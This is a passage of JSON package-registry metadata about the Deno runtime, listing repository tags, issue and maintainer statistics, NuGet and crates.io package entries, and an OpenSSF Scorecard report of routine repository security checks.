.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T13:36:09.847Z","dependent_packages_count":0,"downloads":null,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":56.27430155413802,"dependent_repos_count":6.2280896497958045,"dependent_packages_count":16.636613922702708,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":26.37966837554551},"purl":"pkg:nuget/ytdlp.deno.runtime","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nuget/ytdlp.deno.runtime","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nuget/ytdlp.deno.runtime","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nuget/ytdlp.deno.runtime/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/codemeta","maintainers":[{"uuid":"manuhub","login":"manuhub","name":null,"email":null,"url":null,"packages_count":26,"html_url":"https://www.nuget.org/profiles/manuhub","role":null,"created_at":"2026-02-15T13:51:16.378Z","updated_at":"2026-02-15T13:51:16.378Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/maintainers/manuhub/packages"}],"registry":{"name":"nuget.org","url":"https://www.nuget.org","ecosystem":"nuget","default":true,"packages_count":846800,"maintainers_count":114732,"namespaces_count":0,"keywords_count":175660,"github":"nuget","metadata":{"funded_packages_count":33203,"rate_limit":2},"icon_url":"https://github.com/nuget.png","created_at":"2022-04-04T15:19:23.147Z","updated_at":"2026-09-01T05:04:06.711Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/namespaces"}},{"id":4047429,"name":"deno_ffi","ecosystem":"cargo","description":"Dynamic library ffi for deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":243,"first_release_published_at":"2021-08-10T09:20:44.046Z","latest_release_published_at":"2026-08-06T11:47:40.924Z","latest_release_number":"0.244.0","last_synced_at":"2026-08-29T21:57:56.237Z","created_at":"2022-04-12T10:00:36.199Z","updated_at":"2026-08-31T13:36:09.895Z","registry_url":"https://crates.io/crates/deno_ffi/","install_command":"cargo install deno_ffi","documentation_url":"https://docs.rs/deno_ffi/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using 